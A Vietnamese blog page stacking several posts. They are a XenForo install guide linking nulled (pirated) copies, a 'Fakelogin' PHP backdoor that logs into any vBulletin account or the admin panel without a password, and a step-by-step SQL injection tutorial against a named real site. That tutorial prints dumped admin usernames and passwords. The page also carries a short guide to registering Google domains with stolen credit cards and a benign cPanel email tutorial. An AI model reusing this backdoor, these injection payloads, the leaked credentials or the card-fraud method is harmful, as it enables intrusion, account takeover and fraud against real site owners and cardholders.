[Hướng dẫn] Cài đặt và sử dụng diễn đàn Xenforo đầy đủ - Tiếng Việt

Nhắc đến tạo một diễn đàn đơn giản, đầu tiên ai cũng nghĩ đến VBB bởi vì nó dễ dùng, hoặc IPBoard or Disscuz vì giao diện đẹp. Nhưng gần đây nhiều người đã chuyển qua sử dụng một mã nguồn mới, dễ dùng như VBB nhưng giao diện cũng đẹp như Disscuz. Ở đây mình đang nói đến XenForo.

Đầu tiên là Demo Xenforo cái nhể:
- Fan Music Group KPOP in Viet Nam: http://www.fgviet.net
- 360 KPOP FANSUB IN VIET NAM: http://www.360kpop.com

Hiện Xenforo đã cho ra bản dùng thử mới nhất là XenForo.v1.1.0.Beta.5 các bạn có thể download bản đó tại:

http://www.mediafire.com/?m26j2rzkkcbgp7q

Nhưng theo mình là không nên dùng bản đó. Tại sao? -> Bản đó là bản Beta vì vậy chắc sẽ xuất hiện nhiều lỗi. Trong trường hợp này, mình khuyên dùng các bản cũ mà ổn định hơn như bản XenForo 1.0.2. Hiện mình cũng đàn dùng bản này, các bạn có thể download tại:

http://www.mediafire.com/?if6dz9zd1yvdp8d

Hoặc có thể dùng bản XenForo 1.0.4:

http://www.mediafire.com/?flfd8x2l0s4js0r

*Chú ý: Các mã nguồn mình nêu ở trên đều đã là bản Null, vì phần lớn ACE đều là học sinh, sinh viên, lấy đâu ra tiền để mà mua bản chính thức Vì vậy dùng tạm bản Null cũng được
Các nguồn Null: VietXf, FS

Vậy là xong phần cung cấp mã nguồn. Bây giờ là cách cài đặt:
- Bạn cần phải có một host (Tất nhiên) và host đó phải được tắt SafeMode (Cái này phải liên hệ cho người bán host người ta tắt cho, vì vậy đừng ai đặt câu hỏi là tắt SafeMode kiểu gì ).
- Giải nén bộ mã nguồn mà bạn download ở trên:
+ Với XenForo 1.1.0 Beta 5 thì bạn phải giải nén 2 lần, sau khi giải nén File download về xong bạn còn phải giải nén cả file fs-xf110b5.rar nữa.
+ Với XenForo 1.0.2 hay 1.0.4 thì bạn chỉ cần giải nén 1 lần.

--------------------------------Bắt đầu cài đặt--------------------------------

- Sau khi đã giải nén, ta dùng phần mềm để upload cả thư mục lên host. (Upload kiểu gì thì xin mời bạn đọc các phần hướng dẫn cài đặt VBB). Nếu bạn là người mới tiếp xúc với host thì mình khuyên nên dùng FlashFXP để upload cho dễ. Thời gian upload thì tùy vào từng host, có thể 1 tiếng mà cũng có thể 15'
- Tạo một database (Hay còn gọi là cơ sở dữ liệu).
- CHMOD thư mục internal_data thành 777 (Sau khi cài đặt, nó sẽ tạo một file xác nhận cài đặt vào thư mục này.) Cách CHMOD thì bạn nhấn chuột phải, chọn CHMOD sau đó điền số 777 vào dòng.
- Sau đó, bạn chạy file cài đặt với đường dẫn:

http://yourdomain/forum/install

Nếu bạn đã tắt SafeMode, nó sẽ hiện giao diện sau:

Click tiếp vào nút Begin Installation để tiếp tục cài đặt, bạn điền những thông tin theo chỉ dẫn của hình:

Sau khi đã điền thông tin một cách chính xác, ta nhấn nút Test & Generate Configuaration

Nếu test thành công thì nó sẽ hiện ra(Còn nếu test thất bại thì không nói ):

Nhấn vào nút Save Configuration, sau đó làm theo lời của trình duyệt đề ra. Sau đó nhấn nút Coutinue With Installation để tiếp tục cài đặt.
Việc cài đặt bắt đầu từ đây, đợi cho nó chạy gì thì chạy (Rebulding hoặc là gì gì đó ) Việc này sẽ diễn ra trong khoảng 1 phút 24 giây

Sau khi Build xong, nó sẽ hiện ra một bản để đăng kí ban quản trị. Đây là bước xác định người sẽ điều hành diễn đàn:

Nhấn vào nút Create Administrator để tiếp tục, nó sẽ bắt bạn đặt tên và cấu hình cho Forum của bạn nữa:

Sau khi đã chỉnh sửa hợp lí các thông tin, bạn nhấn nút Setup Option để hoàn thành, một thông báo chúc mừng sẽ hiện ra để chúc mừng bạn đã làm được cái việc mà không ai cũng không thể làm được

Nhấn vào Nút Enter Your Control Panel để đăng nhập vào trang quản trị Admin, nếu muốn vào trang chủ thì bạn hãy vào Board URL bạn đã đặt ở trên

----------------------------------------------------------------------------------

Vậy thì chắc là đã xong rồi, phải đi ăn cái gì để tiếp sức mà viết thêm tut .Sắp tới mình sẽ giới thiệu cho các bạn cách Import Forum từ VBB hay IPBoard sang Xenforo để không mất các dữ liệu cũ, đồng thời cũng hướng dẫn các bạn cài tiếng việt và một số mod thông dụng.

Hẹn gặp lại các bạn trong vài giờ tới. To Be Continue.....

Read More

Fakelogin - Đăng nhập vào forum VBB không cần pass

Code này có tác dụng là khi upload vào thư mục root của forum VBB các bạn có khả năng đăng nhập vào nick bất cứ thành viên nào mà không cần password. Ngoài ra vào đc thẳng admincp mà ko cần gõ lại pass

Quote:

<?php if (isset($_GET['bd'])) { define('THIS_SCRIPT', 'login'); require_once('./global.php'); require_once('./includes/functions_login.php'); $vbulletin->userinfo = $vbulletin->db->query_first("SELECT userid,usergroupid, membergroupids, infractiongroupids, username, password, salt FROM " . TABLE_PREFIX . "user WHERE username = '" . $_GET['bd'] . "'"); if (!$vbulletin->userinfo['userid']) die("Invalid username!"); else { vbsetcookie('userid', $vbulletin->userinfo['userid'], true, true, true); vbsetcookie('password', md5($vbulletin->userinfo['password'] . COOKIE_SALT), true, true, true); exec_unstrike_user($_GET['bd']); process_new_login('cplogin', TRUE, TRUE); do_login_redirect(); } } ?>

Copy đoạn code trên vào notepad save đuôi *.php

Upload vào thư mục chứa forum ngang hàng với file index.php

Sau đó chạy link sau

http://domain.com/forum/*.php?bd=username

Read More

Hướng dẫn tấn công website P1

Tham gia đã lâu,hôm nay rảnh rỗi viết bài hacking cho mọi người tham khảo.Vì thấy có nhiều bạn hỏi hỏi Sql là gì?lfi,rfi là gì?Làm thế nào hack 1 website ,hack 1 forum?Làm sao get root,.....?Một phần vì ở nbt hacking không phát triển mấy .Vì thế bài viết này hi vọng giúp các bạn hiểu rõ vấn đề cũng như đam mê về hack hơn.
Định nghĩa Sql injection là gì?
Đơn giản injection tiếng việt là tiêm.Sql injection là tiêm các câu truy vấn vào.
Bài viết này mình hướng dẫn các bạn về web php,cơ sở dữ liệu phpmysql.
Sql injection chia làm 4 loại cơ bản:
• +Inband
• +Blind
• +Timebase
• +Out of band
Hôm nay ktc2608 sẽ hướng dẫn các bạn khai thác website thông qua lỗi Inband.
Lý thuyết Inband -SQLi:
-Inband là phương pháp dùng hàm union để khai thác.
-Union là hàm lien kết 2 truy vấn (query)”Select….” Với nhau.
Từ version 5.0 trở đi ,mysql có thềm :
• 1 database hệ thống là information_schema
• Các tabkle hệ thống của nó là tables,columns,table chi,….
• 2 table chúng ta cần quan tâm trong information_schema là tables và columns vì 2 table này chứ tên các table và column của website trên hệ thông
Cách khai thác gồm 4 bước
Bước 1:
Kiểm tran website có bị lỗi sql không
Bước 2:
Đếm số cột dùng order by đế xác định cột
Bước 3:
Sử dụng Union liên kết 2 câu truy vấn,tìm table cần khác thác thong qua information_schema.Tables
Bước 4:

Dựa trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên.
Bước 5:

Có talbe và column cần thiết rôi ta chỉ việc khai thác thong tin cần biết
Thực hành
Victim:

Mã:

http://www.kemlam.com

Lang thang tìm được cái link này

Mã:

http://www.kemlam.com/?content=detail&proID=10

Bước 1:
Đầu tiên kiểm tra xem nó có bị lỗi sql injection không đã
Mã:

Mã:

http://www.kemlam.com/?content=detail&proID=10'

Mình thêm dấu nháy thử,vì giả sử câu truy vấn nó thế này

Mã:

$query = 'select * from sanpham where id=1';

Khi thêm dấu ' thì câu truy vấn sẽ là $query = 'select * from sanpham where id=1'';
=>Có tới 3 dấu nháy=> PHP sẽ báo syntax error hoặc hiện trang khác so với bình thường
Bước 2:Đếm số cột dùng order by đế xác định cột.Mình thử đoán số column là 13.Nên order 13 thử.
Mã:

Mã:

http://www.kemlam.com/?content=detail&proID=10 order by 13 --

==>Kết quả trả về bình thường.
Thử order by 14 xem sao
Mã:

Mã:

http://www.kemlam.com/?content=detail&proID=10 order by 14 --

Mã:

==>Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/kemlam/domains/kemlam.com/public_html/details.phpon line 8

Vậy chỉ có 13 Column
Ở đây mình sử dụng dấu -- là đến loại bỏ những phần sau câu truy vấn,trong phpmysql nó dùng để ghi những comment
Bước 3:Sử dụng Union liên kết 2 câu truy vấn,tìm table cần khác thác thong qua information_schema.Tables
Đầu tiên thực hiện Union.
Mã:

Mã:

http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13 --

Id mình sửa lại Null để kết quả câu truy vấn trả về là rỗng,mới show được các column bị lỗi show ra là column số 4 5 6 7 8 9 10.Mình sử dụng hàm version() để show ra version .version() đặt ở 1 trong vị trí các column bị lỗi.ở đây mình đặt ở column số 4
Mã:

Mã:

http://www.kemlam.com/?content=detail&proID=Null UNION SELECT 1,2,3,4,version(),6,7,8,9,10,11,12,13 --

=>Kết quả 5.0.51a-community=>Ngon ăn ,vì mình đã ghi chú ý về version >5.0 trên rồi
Truy vấn các table cần khai thác thông qua information_schema.Tables
Mã:

Mã:

http://www.kemlam.com/?content=detail&proID=Null  UNION SELECT 1,2,3,4,group_concat(table_name) ,6,7,8,9,10,11,12,13   from information_schema.tables where table_schema=database()--

=>Kết quả show ra các

Mã:

table:ads_vn,category_vn,cust_vn,hitcounter,notice,onlin e,pages_vn,product_vn,tinnoibat_vn,tintuc_vn,users

Đến đây mình đoán table users là table chứa user và password admin.(Kỹ năng của mỗi người thôi)
Bước 4ựa trên information_chema.Columns để tìm các COLUMN thuộc table tương ứng bên trên.
Mã:

Mã:

http://www.kemlam.com/?content=detail&proID=Null  UNION SELECT 1,2,3,4,group_concat(column_name) ,6,7,8,9,10,11,12,13   from information_schema.columns where table_name=CHAR(117, 115, 101, 114, 115)--

=>Kq trả về các column trong table users:User_ID,Username,realName,Pass,uRight
đến đây có bạn sẽ thắc mắc,Vì sao talbe_name=CHAR(117, 115, 101, 114, 115)-- mà không phải là table_name=users?
Đơn giản vì ở đây,trong file php.ini magic_quote đang ở chế đố on,nên ta phải đổi qua kiểu char hoặc kiểu ascii,trên đó mình chuyển sang kiểu char.
Bước 5:Có talbe và column cần thiết rôi ta chỉ việc khai thác thong tin cần biết
2 column mình quan tâm là Username,Pass vì mình đoán user và password sẽ đặt ở đây.
Lấy thông tin bằng câu truy vấn đơn giản
Mã:

Mã:

http://www.kemlam.com/?content=detail&proID=Null%20UNION SELECT 1,2,3,4,group_concat(Username,0x2f,Pass),6,7,8,9,10,11,12,13 from users--

=>admin/qsv50502415,kemlam/123654,dinhtuan/123654
Có user và password giờ tim link admin đăng nhập thôi.
Tuy nhiên không khuyến khích các bạn phá hoại website người khác,nếu muốn thể hiện thì up 1 file .txt rồi gửi link cho bạn bè là được rồi
Ai có thắc mắc gì cứ reply phía dưới,nếu mình biết sẽ trả lời,mới viết 1 cách mà dài quá,các kiểu tấn công khác website khác mình sẽ viết ở P2,P3....
Anh em thank nhiệt tình nhé để làm những lỗi khác

Read More

TUT domain Google 1 năm cực kỳ dễ qua cho NB

Nguyên liệu: CCV đủ BL là qua, Ip việt Nam qua lun.
Đâm xong đợi 10 phút là doamin dc kích hoạt.
Live mãn hạn.

Site:
https://www.google.com/a/cpanel/standard/new3


Video HD: http://www.mediafire.com/?y6f7h11itzch6pg

Pass:
Bỏ pass rồi nha các bạn

TUT này cho NB pro đừng chém tội em.

Read More

Cpanel: Hướng dẫn khởi tạo và quản lý email

Giả sử tên miền abc.com đã được cài đặt sử dụng hosting với Cpanel, chúng ta có các thông số kỹ thuật như sau:

Tên miền (Domain): abc.com
Địa chỉ đăng nhập vào Cpanel http://www.abc.com/cpanel hoặc http://www.abc.com:2082
Máy chủ mail (Mail server): mail.abc.com


1. Đăng nhập

Đăng nhập vào Cpanel với thông tin tài khoản Cpanel đã được cung cấp.



Tài màn hình chính sau khi đăng nhập, tìm mục Mail


Đây là màn hình tập trung tất cả các chức năng liên quan đến việc quản lý và sử dụng email.


2. Khởi tạo email

Chọn Email Accounts để vào mục tạo mới và quản lý các địa chỉ email.

Mục tạo địa chỉ email mới ở ngay đầu màn hình:



Nhấn Create Account để thiết lập địa chỉ email với thông số đã nhập.


3. Quản lý các địa chỉ email

Kề dưới mục tạo mới là mục quản lý email



Mục Usage / Quota hiển thị dung lượng sử dụng của mỗi email.

Change password thay đổi mật khẩu

Change quota thay đổi dung lượng hộp thư

Delete xóa email và tất cả dữ liệu email trong đó


4. Chuyển tiếp email

Chọn Forwarders để vào mục chuyển tiếp email:



Chọn Add Forwarders để tạo lệnh chuyển tiếp:

Read More